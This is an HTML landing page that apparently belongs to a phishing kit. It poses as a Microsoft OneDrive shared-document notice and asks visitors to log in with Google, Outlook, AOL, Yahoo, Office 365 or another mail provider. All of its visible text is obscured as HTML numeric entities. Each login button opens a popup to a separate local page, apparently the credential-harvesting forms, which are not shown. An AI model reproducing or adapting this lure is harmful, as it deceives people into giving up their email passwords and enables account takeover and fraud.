
<!DOCTYPE html>
<html >
<head>
<meta charset="UTF-8">
<title>&#79;&#110;&#101;&#32;&#68;&#114;&#105;&#118;&#101;&#32;&#67;&#108;&#111;&#117;&#100;&#32;&#68;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#32;&#83;&#104;&#97;&#114;&#105;&#110;&#103;</title>
<link rel='stylesheet prefetch' href='https://fonts.googleapis.com/css?family=Open+Sans:600'>
<link rel="stylesheet" href="css/style.css">
<script type="text/javascript">
<!--
function popupwnd(url, toolbar, menubar, locationbar, resize, scrollbars, statusbar, left, top, width, height)
{
   if (left == -1)
   {
      left = (screen.width/2)-(width/2);
   }
   if (top == -1)
   {
      top = (screen.height/2)-(height/2);
   }
   var popupwindow = this.open(url, '', 'toolbar=' + toolbar + ',menubar=' + menubar + ',location=' + locationbar + ',scrollbars=' + scrollbars + ',resizable=' + resize + ',status=' + statusbar + ',left=' + left + ',top=' + top + ',width=' + width + ',height=' + height);
}
//-->
</script>
</head>

<body>
<div class="login-wrap">
  <div class="login-html">
	  <div class="LogoOne"></div>
	   <div class="foot-lnk">&#84;&#111;&#32;&#114;&#101;&#97;&#100;&#32;&#116;&#104;&#101;&#32;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#44;&#32;&#112;&#108;&#101;&#97;&#115;&#101;&#32;&#99;&#104;&#111;&#111;&#115;&#101;&#32;&#121;&#111;&#117;&#114;&#32;&#101;&#109;&#97;&#105;&#108;&#32;&#112;&#114;&#111;&#118;&#105;&#100;&#101;&#114;&#32;&#98;&#101;&#108;&#111;&#119;&#32;&#76;&#111;&#103;&#105;&#110;&#32;&#116;&#111;&#32;&#118;&#105;&#101;&#119;&#32;&#115;&#104;&#97;&#114;&#101;&#100;&#32;&#102;&#105;&#108;&#101;. </div>
    <!--<div class="top"></div>-->
    <!--<input id="tab-1" type="radio" name="tab" class="sign-in" checked><label for="tab-1" class="tab">Sign In</label>
		<input id="tab-2" type="radio" name="tab" class="sign-up"><label for="tab-2" class="tab">Sign Up</label>-->
    <div class="login-form">
      <div class="sign-in-htm">
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--google" onclick="popupwnd('GGN.html','no','no','no','no','no','no','300','100','400','400')">&#76;&#111;&#103;&#105;&#110;&#32;&#119;&#105;&#116;&#104;&#32;&#71;&#111;&#111;&#103;&#108;&#101;</button>
        </div>
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--outlook" onclick="popupwnd('LL1.htm','no','no','no','no','no','no','300','100','480','480')">&#76;&#111;&#103;&#105;&#110;&#32;&#119;&#105;&#116;&#104;&#32;&#79;&#117;&#116;&#108;&#111;&#111;&#107;</button>
        </div>
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--aol" onclick="popupwnd('AA1.htm','no','no','no','no','no','no','300','100','400','400')">&#76;&#111;&#103;&#105;&#110;&#32;&#119;&#105;&#116;&#104;&#32;&#65;&#111;&#108;</button>
        </div>
        <div class="group">
			<button class="btn-3 loginBtn loginBtn--yahoo" onclick="popupwnd('YY.html','no','no','no','no','no','no','300','100','400','400')">&#76;&#111;&#103;&#105;&#110;&#32;&#119;&#105;&#116;&#104;&#32;&#89;&#97;&#104;&#111;&#111;</button>
        </div>
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--office" onclick="popupwnd('OF.htm','no','no','no','no','no','no','300','100','400','400')">&#76;&#111;&#103;&#105;&#110;&#32;&#119;&#105;&#116;&#104;&#32;&#79;&#102;&#102;&#105;&#99;&#101;&#32;&#51;&#54;&#53;</button>
        </div>
        <div class="group">
          <button class="btn-3 loginBtn loginBtn--other" onclick="popupwnd('OT.htm','no','no','no','no','no','no','300','100','400','400')">&#76;&#111;&#103;&#105;&#110;&#32;&#119;&#105;&#116;&#104;&#32;&#79;&#116;&#104;&#101;&#114;&#32;&#77;&#97;&#105;&#108;</button>
        </div>
        <!--<div class="hr"></div>-->
        <div class="foot-lnk">&#71;&#101;&#116;&#32;&#116;&#111;&#32;&#97;&#108;&#108;&#32;&#121;&#111;&#117;&#114;&#32;&#102;&#105;&#108;&#101;&#115;&#32;&#102;&#114;&#111;&#109;&#32;&#97;&#110;&#121;&#119;&#104;&#101;&#114;&#101;&#32;&#111;&#110;&#32;&#97;&#110;&#121;&#32;&#100;&#101;&#118;&#105;&#99;&#101;&#44;&#32;&#97;&#110;&#100;&#32;&#115;&#104;&#97;&#114;&#101;&#32;&#116;&#104;&#101;&#109;&#32;&#119;&#105;&#116;&#104;&#32;&#97;&#110;&#121;&#111;&#110;&#101;&#46;&#32;&#79;&#110;&#101;&#32;&#68;&#114;&#105;&#118;&#101;&#32;&#121;&#111;&#117;&#114;&#32;&#115;&#104;&#97;&#114;&#101;&#100;&#32;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#32;&#105;&#110;&#32;&#111;&#110;&#101;&#32;&#99;&#108;&#111;&#117;&#100;. </div>
      </div>
    </div>
  </div>
</div>
<!--</div>-->
</body>
</html>
